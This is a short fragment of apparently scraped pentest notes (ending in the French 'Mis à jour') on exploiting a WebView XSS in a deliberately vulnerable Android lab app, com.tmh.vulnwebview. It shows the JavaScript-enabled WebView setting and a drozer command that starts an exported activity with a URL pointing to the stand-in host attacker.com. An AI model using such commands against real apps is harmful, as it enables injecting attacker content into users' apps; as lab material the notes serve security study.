RXSS
Reconnaissance
webView.getSettings().setJavaScriptEnabled(true);Exploitation
Simple XSS
dz> run app.activity.start --component com.tmh.vulnwebview com.tmh.vulnwebview.RegistrationWebView --extra string reg_url "https://attacker.com/poc.html"
Mis à jour